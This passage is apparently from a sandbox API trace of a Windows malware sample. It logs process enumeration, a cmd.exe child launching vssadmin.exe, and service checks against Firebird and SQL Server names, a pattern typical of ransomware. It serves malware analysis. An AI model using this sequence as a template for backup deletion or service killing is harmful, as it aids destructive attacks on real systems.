cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0045.828] lstrlenW (lpString="csrss.exe") returned 9 [0045.828] Process32NextW (in: hSnapshot=0x210, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0045.828] lstrlenW (lpString="winlogon.exe") returned 12 [0045.829] Process32NextW (in: hSnapshot=0x210, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0045.829] lstrlenW (lpString="services.exe") returned 12 [0045.829] Process32NextW (in: hSnapshot=0x210, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0045.830] lstrlenW (lpString="lsass.exe") returned 9 [0045.830] Process32NextW (in: hSnapshot=0x210, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0045.831] lstrlenW (lpString="lsm.exe") returned 7 [0045.831] Process32NextW (in: hSnapshot=0x210, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0045.831] lstrlenW (lpString="svchost.exe") returned 11 [0045.831] Process32NextW (in: hSnapshot=0x210, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0045.832] lstrlenW (lpString="svchost.exe") returned 11 [0045.832] Process32NextW (in: hSnapshot=0x210, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0045.833] lstrlenW (lpString="svchost.exe") returned 11 [0045.833] Process32NextW (in: hSnapshot=0x210, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0045.833] lstrlenW (lpString="svchost.exe") returned 11 [0045.833] Process32NextW (in: hSnapshot=0x210, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0045.834] lstrlenW (lpString="svchost.exe") returned 11 [0045.834] Process32NextW (in: hSnapshot=0x210, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0045.835] lstrlenW (lpString="audiodg.exe") returned 11 [0045.835] Process32NextW (in: hSnapshot=0x210, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0045.835] lstrlenW (lpString="svchost.exe") returned 11 [0045.835] Process32NextW (in: hSnapshot=0x210, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0045.836] lstrlenW (lpString="svchost.exe") returned 11 [0045.836] Process32NextW (in: hSnapshot=0x210, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0045.837] lstrlenW (lpString="dwm.exe") returned 7 [0045.837] Process32NextW (in: hSnapshot=0x210, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0045.838] lstrlenW (lpString="explorer.exe") returned 12 [0045.838] Process32NextW (in: hSnapshot=0x210, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0045.838] lstrlenW (lpString="spoolsv.exe") returned 11 [0045.838] Process32NextW (in: hSnapshot=0x210, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0045.839] lstrlenW (lpString="taskhost.exe") returned 12 [0045.839] Process32NextW (in: hSnapshot=0x210, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0045.840] lstrlenW (lpString="svchost.exe") returned 11 [0045.840] Process32NextW (in: hSnapshot=0x210, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0045.840] lstrlenW (lpString="taskeng.exe") returned 11 [0045.840] Process32NextW (in: hSnapshot=0x210, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0045.841] lstrlenW (lpString="taskhost.exe") returned 12 [0045.841] Process32NextW (in: hSnapshot=0x210, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="called.exe")) returned 1 [0045.842] lstrlenW (lpString="called.exe") returned 10 [0045.842] Process32NextW (in: hSnapshot=0x210, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pal_bermuda_xhtml.exe")) returned 1 [0045.842] lstrlenW (lpString="pal_bermuda_xhtml.exe") returned 21 [0045.842] Process32NextW (in: hSnapshot=0x210, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="analyst.exe")) returned 1 [0045.843] lstrlenW (lpString="analyst.exe") returned 11 [0045.843] Process32NextW (in: hSnapshot=0x210, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="resolved_encourages_statewide.exe")) returned 1 [0045.844] lstrlenW (lpString="resolved_encourages_statewide.exe") returned 33 [0045.844] Process32NextW (in: hSnapshot=0x210, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wages.exe")) returned 1 [0045.844] lstrlenW (lpString="wages.exe") returned 9 [0045.844] Process32NextW (in: hSnapshot=0x210, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rand.exe")) returned 1 [0045.845] lstrlenW (lpString="rand.exe") returned 8 [0045.845] Process32NextW (in: hSnapshot=0x210, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vacations considered astrology.exe")) returned 1 [0045.846] lstrlenW (lpString="vacations considered astrology.exe") returned 34 [0045.846] Process32NextW (in: hSnapshot=0x210, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cottage.exe")) returned 1 [0046.030] lstrlenW (lpString="cottage.exe") returned 11 [0046.030] Process32NextW (in: hSnapshot=0x210, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pairs_spec.exe")) returned 1 [0046.052] lstrlenW (lpString="pairs_spec.exe") returned 14 [0046.052] Process32NextW (in: hSnapshot=0x210, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="arthur cyber bid.exe")) returned 1 [0046.059] lstrlenW (lpString="arthur cyber bid.exe") returned 20 [0046.059] Process32NextW (in: hSnapshot=0x210, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="observationshairy.exe")) returned 1 [0046.069] lstrlenW (lpString="observationshairy.exe") returned 21 [0046.069] Process32NextW (in: hSnapshot=0x210, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="portland-workforce-patient.exe")) returned 1 [0046.069] lstrlenW (lpString="portland-workforce-patient.exe") returned 30 [0046.069] Process32NextW (in: hSnapshot=0x210, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x15c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spectrum.exe")) returned 1 [0046.070] lstrlenW (lpString="spectrum.exe") returned 12 [0046.070] Process32NextW (in: hSnapshot=0x210, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dies.exe")) returned 1 [0046.071] lstrlenW (lpString="dies.exe") returned 8 [0046.071] Process32NextW (in: hSnapshot=0x210, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configured.exe")) returned 1 [0046.071] lstrlenW (lpString="configured.exe") returned 14 [0046.071] Process32NextW (in: hSnapshot=0x210, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rememberkatrina.exe")) returned 1 [0046.072] lstrlenW (lpString="rememberkatrina.exe") returned 19 [0046.072] Process32NextW (in: hSnapshot=0x210, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x488, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fast.exe")) returned 1 [0046.073] lstrlenW (lpString="fast.exe") returned 8 [0046.073] Process32NextW (in: hSnapshot=0x210, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="berkeley-challenges-binding.exe")) returned 1 [0046.074] lstrlenW (lpString="berkeley-challenges-binding.exe") returned 31 [0046.074] Process32NextW (in: hSnapshot=0x210, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="review.exe")) returned 1 [0046.075] lstrlenW (lpString="review.exe") returned 10 [0046.075] Process32NextW (in: hSnapshot=0x210, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="historybinding.exe")) returned 1 [0046.075] lstrlenW (lpString="historybinding.exe") returned 18 [0046.075] Process32NextW (in: hSnapshot=0x210, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pk task surge.exe")) returned 1 [0046.076] lstrlenW (lpString="pk task surge.exe") returned 17 [0046.076] Process32NextW (in: hSnapshot=0x210, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0046.077] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0046.077] Process32NextW (in: hSnapshot=0x210, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="mobsync.exe")) returned 1 [0046.077] lstrlenW (lpString="mobsync.exe") returned 11 [0046.078] Process32NextW (in: hSnapshot=0x210, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ivttvf.exe")) returned 1 [0046.078] lstrlenW (lpString="ivttvf.exe") returned 10 [0046.078] Process32NextW (in: hSnapshot=0x210, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa90, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0046.079] lstrlenW (lpString="cmd.exe") returned 7 [0046.079] Process32NextW (in: hSnapshot=0x210, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0046.080] lstrlenW (lpString="conhost.exe") returned 11 [0046.080] Process32NextW (in: hSnapshot=0x210, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xa9c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0046.080] lstrlenW (lpString="vssadmin.exe") returned 12 [0046.080] Process32NextW (in: hSnapshot=0x210, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0046.081] lstrlenW (lpString="VSSVC.exe") returned 9 [0046.081] Process32NextW (in: hSnapshot=0x210, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0046.082] lstrlenW (lpString="svchost.exe") returned 11 [0046.082] Process32NextW (in: hSnapshot=0x210, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0046.083] CloseHandle (hObject=0x210) returned 1 [0046.083] Sleep (dwMilliseconds=0x1f4) [0046.697] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x5efff8 [0046.698] EnumServicesStatusExW (in: hSCManager=0x5efff8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 0 [0046.698] GetLastError () returned 0xea [0046.698] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x12c6) returned 0x39606f0 [0046.698] EnumServicesStatusExW (in: hSCManager=0x5efff8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x39606f0, cbBufSize=0x12c6, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x39606f0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 1 [0046.699] CloseServiceHandle (hSCObject=0x5efff8) returned 1 [0046.699] lstrlenW (lpString="Appinfo") returned 7 [0046.699] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0046.699] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0046.699] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0046.699] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0046.699] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0046.699] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0046.699] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0046.699] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0046.699] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0046.699] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0046.699] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0046.699] lstrlenW (lpString="AudioSrv") returned 8 [0046.699] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0046.699] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0046.699] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0046.699] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0046.700] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0046.700] lstrlenW (lpString="BFE") returned 3 [0046.700] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0046.700] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0046.700] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0046.700] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0046.700] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0046.700] lstrlenW (lpString="CryptSvc") returned 8 [0046.700] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0046.700] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0046.700] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0046.700] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0046.700] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0046.700] lstrlenW (lpString="CscService") returned 10 [0046.700] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0046.700] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0046.700] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0046.700] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0046.700] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0046.700] lstrlenW (lpString="DcomLaunch") returned 10 [0046.700] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0046.700] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0046.700] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0046.700] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0046.700] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0046.700] lstrlenW (lpString="Dhcp") returned 4 [0046.700] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0046.700] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0046.700] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0046.700] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0046.700] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0046.700] lstrlenW (lpString="Dnscache") returned 8 [0046.700] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0046.700] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0046.700] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0046.701] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0046.701] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0046.701] lstrlenW (lpString="DPS") returned 3 [0046.701] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0046.701] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0046.701] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0046.701] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0046.701] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0046.701] lstrlenW (lpString="eventlog") returned 8 [0046.701] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0046.701] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0046.701] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0046.701] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0046.701] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0046.701] lstrlenW (lpString="EventSystem") returned 11 [0046.701] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0046.701] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0046.701] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0046.701] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0046.701] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0046.701] lstrlenW (lpString="gpsvc") returned 5 [0046.701] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0046.701] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0046.701] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0046.701] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0046.701] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0046.701] lstrlenW (lpString="iphlpsvc") returned 8 [0046.701] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0046.701] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0046.701] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0046.701] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0046.701] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0046.701] lstrlenW (lpString="LanmanServer") returned 12 [0046.701] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0046.701] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0046.702] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0046.702] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0046.702] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 